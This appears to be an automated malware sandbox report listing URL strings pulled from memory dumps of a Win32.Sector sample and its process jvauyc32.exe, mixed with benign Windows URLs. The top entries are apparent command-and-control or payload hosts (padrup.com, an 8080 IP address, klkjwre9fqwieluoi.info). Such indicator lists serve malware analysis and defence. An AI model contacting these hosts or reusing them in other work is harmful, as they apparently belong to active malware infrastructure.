        Source: jvauyc32.exe, 0000000A.00000003.2524944921.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2407819962.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000002.4063142769.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.3254569338.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2331666794.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2938885386.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2769552015.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2460098695.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2847114789.0000000001446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?50e8edc=169680312
        Source: jvauyc32.exe, 0000000A.00000003.2524944921.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2407819962.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000002.4063142769.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.3254569338.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2331666794.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2938885386.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2769552015.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2460098695.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2847114789.0000000001446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?50e8edc=169680312D
        Source: jvauyc32.exe, 0000000A.00000003.2460098695.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2847114789.0000000001446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?5b7e0de=767493872
        Source: jvauyc32.exe, 0000000A.00000003.3501517334.00000000013B9000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000002.4063142769.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.3254569338.00000000013B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?5b7e0de=767493872W
        Source: jvauyc32.exe, 0000000A.00000003.2524944921.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2407819962.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.3254569338.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2331666794.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2938885386.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2769552015.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2460098695.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2847114789.0000000001446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?5b7e0de=767493872f
        Source: jvauyc32.exe, 0000000A.00000003.2524944921.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2407819962.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.3254569338.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2331666794.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2938885386.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2769552015.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2460098695.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2847114789.0000000001446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?5b7e0de=767493872u
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1697379207.0000000000962000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1697379207.0000000000905000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?72f523=7533859
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1697379207.0000000000962000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?72f523=7533859A
        Source: jvauyc32.exe, 0000000A.00000003.2847114789.0000000001446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?7caa7d=57190763
        Source: jvauyc32.exe, 0000000A.00000003.2086807690.00000000013B9000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2043123280.00000000013B8000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2009490304.00000000013B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?7caa7d=57190763F
        Source: jvauyc32.exe, 0000000A.00000003.2086807690.00000000013B9000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2043123280.00000000013B8000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2009490304.00000000013B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?7caa7d=57190763W
        Source: jvauyc32.exe, 0000000A.00000003.2524944921.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2407819962.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000002.4063142769.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2086807690.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.3254569338.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2043123280.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.1816216518.0000000001447000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2009490304.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2331666794.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2938885386.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2769552015.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2460098695.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2847114789.0000000001446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?cb36a4=13317796
        Source: jvauyc32.exe, 0000000A.00000003.1816216518.0000000001447000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?cb36a4=133177960
        Source: jvauyc32.exe, 0000000A.00000003.1816216518.0000000001447000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?cb36a4=13317796X
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1715429645.0000000005FB3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1715429645.0000000005F9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?df9780=58613248
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1697379207.0000000000962000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?df9780=58613248J
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1697379207.0000000000962000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?df9780=58613248P
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1697379207.0000000000962000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?df9780=58613248e
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1697379207.0000000000962000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?df9780=58613248e&
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1712636020.00000000013F9000.00000004.00000010.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1706613049.0000000000A43000.00000004.10000000.00040000.00000000.sdmp, SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1714018983.00000000042DA000.00000004.00000010.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1697379207.00000000008BE000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1711811568.00000000010BE000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000003.1559539184.000000000089B000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000002.4013785949.0000000000953000.00000004.10000000.00040000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.1719947674.00000000013B0000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2043123280.00000000013B8000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2009490304.00000000013B8000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000002.4054635692.0000000000F7E000.00000040.00000001.01000000.00000009.sdmp, jvauyc32.exe, 00000018.00000002.2148956614.0000000000923000.00000004.10000000.00040000.00000000.sdmp, jvauyc32.exe, 00000018.00000002.2159163080.0000000000F7E000.00000040.00000001.01000000.00000009.sdmpString found in binary or memory: http://padrup.com/sobaka1.gifhttp://190.120.227.91:8080/sobakavolos.gif
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1715429645.0000000005F95000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.coq
        Source: SearchApp.exe, 0000001E.00000000.2131075059.000001D62D569000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schema.skype.com/Mention
        Source: explorer.exe, 00000017.00000002.4061338441.0000000002C60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000017.00000000.1800500684.0000000007670000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000017.00000000.1805436497.00000000082D0000.00000002.00000001.00040000.00000000.sdmp, RuntimeBroker.exe, 0000001D.00000000.1970603063.0000023D73980000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.klkjwre9fqwieluoi.info/
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.klkjwre9fqwieluoi.info/amsint32.sysGetSystemDirectoryAdrivers
        Source: svchost.exe, 00000014.00000000.1740826743.000001697A641000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.4037252472.000001697A641000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
        Source: svchost.exe, 00000014.00000000.1740767200.000001697A613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000000.1740826743.000001697A641000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.4034151279.000001697A613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.4037252472.000001697A641000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://%s.xboxlive.com
        Source: svchost.exe, 00000014.00000000.1740767200.000001697A613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.4034151279.000001697A613000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://%s.xboxlive.comdS
        Source: svchost.exe, 00000014.00000000.1740826743.000001697A641000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.4037252472.000001697A641000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://%s.xboxlive.comint
        Source: svchost.exe, 00000014.00000000.1740927519.000001697A6A9000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.4037252472.000001697A641000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com
        Source: explorer.exe, 00000017.00000003.3086535581.000000000BD22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1833219394.000000000BD22000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp(
        Source: svchost.exe, 00000014.00000000.1740826743.000001697A641000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.4037252472.000001697A641000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.comy
        Source: SearchApp.exe, 0000001E.00000000.2000494937.000001CE189A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb
        Source: explorer.exe, 00000017.00000000.1833219394.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2136150315.000000000BE31000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
        Source: explorer.exe, 00000017.00000000.1833219394.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2136150315.000000000BE31000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSJM
        Source: explorer.exe, 00000017.00000000.1833219394.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2136150315.000000000BE31000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSZM
        Source: explorer.exe, 00000017.00000000.1833219394.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2136150315.000000000BE31000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSp
        Source: SearchApp.exe, 0000001E.00000000.2348124768.000001D62E157000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/news/feed?ocid=winsearch&market=en-us&query=good%20news&apikey=uvobH5fEn1uz1xwZ5
        Source: explorer.exe, 00000017.00000000.1811548975.0000000008796000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/rT
        Source: explorer.exe, 00000017.00000000.1811548975.000000000862F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
        Source: jvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=A1668CA4549A443399161CE8D2237D12&timeOut=5000&oc
        Source: explorer.exe, 00000017.00000000.1811548975.0000000008685000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?z$
        Source: explorer.exe, 00000017.00000000.1811548975.0000000008796000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/~T
        Source: jvauyc32.exe, 00000012.00000003.3692106800.00000000031CD000.00000004.00001000.00020000.00000000.sdmp, jvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1797327273.0000000002F10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3087282333.0000000002F10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
        Source: explorer.exe, 00000017.00000000.1811548975.0000000008685000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
        Source: svchost.exe, 00000014.00000000.1740826743.000001697A641000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.4042487399.000001697A6A9000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000000.1740927519.000001697A6A9000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.4037252472.000001697A641000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.activity.windows.com
        Source: svchost.exe, 00000014.00000000.1740826743.000001697A641000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.4037252472.000001697A641000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.activity.windows.com/v1/assets
        Source: svchost.exe, 00000014.00000000.1740826743.000001697A641000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.4042487399.000001697A6A9000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000000.1740927519.000001697A6A9000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.4037252472.000001697A641000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.activity.windows.com/v1/assets/$batch
        Source: explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
        Source: explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg
        Source: jvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg
        Source: jvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi
        Source: svchost.exe, 00000014.00000000.1740856753.000001697A665000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.4039173983.000001697A665000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://bn2-df.notify.windows.com/v2/register/xplatform/device
        Source: explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
        Source: explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
        Source: jvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhb
        Source: jvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhb-dark
        Source: jvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPfv
        Source: jvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPfv-dark
        Source: jvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPi8
        Source: jvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPi8-dark
        Source: explorer.exe, 00000017.00000003.3086535581.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1833219394.000000000BDC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
        Source: StartMenuExperienceHost.exe, 0000001C.00000000.1921378411.00000273D826E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.comp
        Source: SearchApp.exe, 0000001E.00000000.2105582330.000001D61CC23000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fb.me/react-polyfills
        Source: SearchApp.exe, 0000001E.00000000.2058381018.000001D61A4C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://gcchigh.loki.office365.us/apihttps://msit.loki.delve.office.com/apihttps://gcc.loki.delve.of
        Source: svchost.exe, 00000014.00000000.1740856753.000001697A665000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.4039173983.000001697A665000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://global.notify.windows.com/v2/register/xplatform/device
        Source: jvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA11f7Wa.img
        Source: explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
        Source: jvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1bjET8.img
        Source: jvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1eBTmz.img
        Source: jvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hGNsX.img
        Source: jvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAT0qC2.img
        Source: jvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AATs0AB.img
        Source: jvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1e6XdQ.img
        Source: svchost.exe, 00000014.00000002.4042487399.000001697A6A9000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000000.1740927519.000001697A6A9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
        Source: svchost.exe, 00000014.00000002.4042487399.000001697A6A9000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000000.1740927519.000001697A6A9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
        Source: svchost.exe, 00000014.00000000.1740856753.000001697A665000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.4039173983.000001697A665000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.local
        Source: svchost.exe, 00000014.00000000.1740856753.000001697A665000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.4039173983.000001697A665000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.local/
        Source: svchost.exe, 00000014.00000002.4042487399.000001697A6A9000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000000.1740927519.000001697A6A9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net
        Source: svchost.exe, 00000014.00000002.4042487399.000001697A6A9000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000000.1740927519.000001697A6A9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/
        Source: SearchApp.exe, 0000001E.00000000.2043154150.000001D61A247000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://loki.delve.office.com/api
        Source: SearchApp.exe, 0000001E.00000000.2105052420.000001D61CBBB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://mths.be/fromcodepoint
        Source: SearchApp.exe, 0000001E.00000000.2196009947.000001D62DC41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.com/web-widget?form=M
        Source: explorer.exe, 00000017.00000003.3086535581.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1833219394.000000000BDC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
